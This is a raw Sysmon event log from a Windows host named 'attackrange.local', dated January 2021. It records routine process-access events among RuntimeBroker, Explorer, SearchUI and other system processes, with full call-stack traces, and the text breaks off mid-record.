13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.320{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+b8fc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.273{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+c370|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.273{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.055{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.023{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.023{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.976{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132554519155737523.txt2021-01-18 13:58:35.976 10341000x800000000000000012485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000012484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845220C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845220C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-8E46-6005-1100-00000000A301}11721276C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\W